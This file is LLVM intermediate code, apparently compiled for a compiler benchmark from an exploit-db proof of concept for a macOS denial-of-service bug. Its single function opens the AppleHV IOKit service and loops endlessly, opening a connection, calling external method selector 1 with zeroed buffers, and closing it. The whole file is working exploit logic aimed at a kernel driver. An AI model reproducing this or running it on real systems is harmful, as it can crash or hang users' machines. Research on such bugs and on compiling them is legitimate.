; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_39370.c_go.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/osx/dos/extr_39370.c_go.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@kIOMasterPortDefault = common dso_local global i32 0, align 4
@.str = private unnamed_addr constant [8 x i8] c"AppleHV\00", align 1
@MACH_PORT_NULL = common dso_local global i64 0, align 8
@.str.1 = private unnamed_addr constant [20 x i8] c"can't find service\0A\00", align 1
@.str.2 = private unnamed_addr constant [26 x i8] c"can't connect to service\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @go() #0 {
  %1 = alloca i32, align 4
  %2 = alloca i64, align 8
  %3 = alloca i64, align 8
  %4 = alloca [16 x i32], align 16
  %5 = alloca i64, align 8
  %6 = alloca [4096 x i32], align 16
  %7 = alloca i64, align 8
  %8 = alloca [16 x i32], align 16
  %9 = alloca i32, align 4
  %10 = alloca [4096 x i8], align 16
  %11 = alloca i64, align 8
  %12 = alloca i32, align 4
  %13 = load i32, i32* @kIOMasterPortDefault, align 4
  %14 = call i32 @IOServiceMatching(i8* getelementptr inbounds ([8 x i8], [8 x i8]* @.str, i64 0, i64 0))
  %15 = call i64 @IOServiceGetMatchingService(i32 %13, i32 %14)
  store i64 %15, i64* %2, align 8
  %16 = load i64, i64* %2, align 8
  %17 = load i64, i64* @MACH_PORT_NULL, align 8
  %18 = icmp eq i64 %16, %17
  br i1 %18, label %19, label %21

19:                                               ; preds = %0
  %20 = call i32 @printf(i8* getelementptr inbounds ([20 x i8], [20 x i8]* @.str.1, i64 0, i64 0))
  store i32 0, i32* %1, align 4
  br label %44

21:                                               ; preds = %0
  br label %22

22:                                               ; preds = %21, %31
  %23 = load i64, i64* %2, align 8
  %24 = call i32 (...) @mach_task_self()
  %25 = call i32 @IOServiceOpen(i64 %23, i32 %24, i32 0, i64* %3)
  %26 = load i64, i64* %3, align 8
  %27 = load i64, i64* @MACH_PORT_NULL, align 8
  %28 = icmp eq i64 %26, %27
  br i1 %28, label %29, label %31

29:                                               ; preds = %22
  %30 = call i32 @printf(i8* getelementptr inbounds ([26 x i8], [26 x i8]* @.str.2, i64 0, i64 0))
  store i32 0, i32* %1, align 4
  br label %44

31:                                               ; preds = %22
  store i64 0, i64* %5, align 8
  store i64 0, i64* %7, align 8
  %32 = bitcast [16 x i32]* %8 to i8*
  call void @llvm.memset.p0i8.i64(i8* align 16 %32, i8 0, i64 64, i1 false)
  store i32 16, i32* %9, align 4
  %33 = bitcast [4096 x i8]* %10 to i8*
  call void @llvm.memset.p0i8.i64(i8* align 16 %33, i8 0, i64 4096, i1 false)
  store i64 4096, i64* %11, align 8
  %34 = load i64, i64* %3, align 8
  %35 = getelementptr inbounds [16 x i32], [16 x i32]* %4, i64 0, i64 0
  %36 = load i64, i64* %5, align 8
  %37 = getelementptr inbounds [4096 x i32], [4096 x i32]* %6, i64 0, i64 0
  %38 = load i64, i64* %7, align 8
  %39 = getelementptr inbounds [16 x i32], [16 x i32]* %8, i64 0, i64 0
  %40 = getelementptr inbounds [4096 x i8], [4096 x i8]* %10, i64 0, i64 0
  %41 = call i32 @IOConnectCallMethod(i64 %34, i32 1, i32* %35, i64 %36, i32* %37, i64 %38, i32* %39, i32* %9, i8* %40, i64* %11)
  store i32 %41, i32* %12, align 4
  %42 = load i64, i64* %3, align 8
  %43 = call i32 @IOServiceClose(i64 %42)
  br label %22

44:                                               ; preds = %29, %19
  %45 = load i32, i32* %1, align 4
  ret i32 %45
}

declare dso_local i64 @IOServiceGetMatchingService(i32, i32) #1

declare dso_local i32 @IOServiceMatching(i8*) #1

declare dso_local i32 @printf(i8*) #1

declare dso_local i32 @IOServiceOpen(i64, i32, i32, i64*) #1

declare dso_local i32 @mach_task_self(...) #1

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memset.p0i8.i64(i8* nocapture writeonly, i8, i64, i1 immarg) #2

declare dso_local i32 @IOConnectCallMethod(i64, i32, i32*, i64, i32*, i64, i32*, i32*, i8*, i64*) #1

declare dso_local i32 @IOServiceClose(i64) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
